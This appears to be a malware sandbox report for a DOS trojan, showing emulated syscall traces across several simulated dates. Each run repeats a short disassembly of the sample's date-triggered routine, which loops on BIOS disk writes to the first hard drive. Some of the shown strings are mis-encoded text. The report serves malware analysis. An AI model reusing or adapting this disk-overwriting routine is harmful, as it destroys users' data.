Sample viewer

vx.netlux.org/Trojan.DOS.UCF.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:59.769602331Z 42 PC: 13855 | Get date
0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-17T22:49:59.77250335Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:49:59.774395335Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:49:59.775408984Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:49:59.776475961Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:49:59.780748113Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-17T22:49:59.787083445Z 9 PC: 13289 | Display string (String= '���tf��u��������S@�`��������F<�u#��������t�P_��������������<-t��tPVh�6������ ����1�[^ÊP��t;VS������ ��������и��t!RSVh�6�������1��=�c���1��[^�VS��(�É���P����Ph=7�����&1ҍD')
2018-12-17T22:49:59.792605201Z 9 PC: 13289 | Display string (String= ' ��p�室 �� ���᪨� ॣ����: ')
2018-12-17T22:49:59.796958234Z 9 PC: 13289 | Display string (String= '�ࠢ� Shift')
2018-12-17T22:49:59.799085174Z 9 PC: 13289 | Display string (String= ' �� ��⨭᪨�: ')
2018-12-17T22:49:59.805302515Z 9 PC: 13289 | Display string (String= '���� Shift')
2018-12-17T22:49:59.807947475Z 9 PC: 13289 | Display string (String= ' ')
2018-12-17T22:49:59.811437408Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:07.508755664Z 42 PC: 13855 | Get date
0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-25T12:27:07.513368917Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:07.515134456Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:07.516516908Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:07.517979037Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:07.52032903Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-25T12:27:07.528369994Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.535249763Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.543016852Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.545484364Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.550302988Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.560438602Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.565303347Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')

{"DateBased":true,"Day":30,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:07.653998037Z 42 PC: 13855 | Get date
0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:08.061347525Z 42 PC: 13855 | Get date
0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-25T12:27:08.065329956Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:08.066654057Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:08.067770789Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:08.069518475Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:08.071174806Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-25T12:27:08.078482117Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.084688775Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.091485435Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.093888499Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.09872268Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.101871528Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.106586235Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')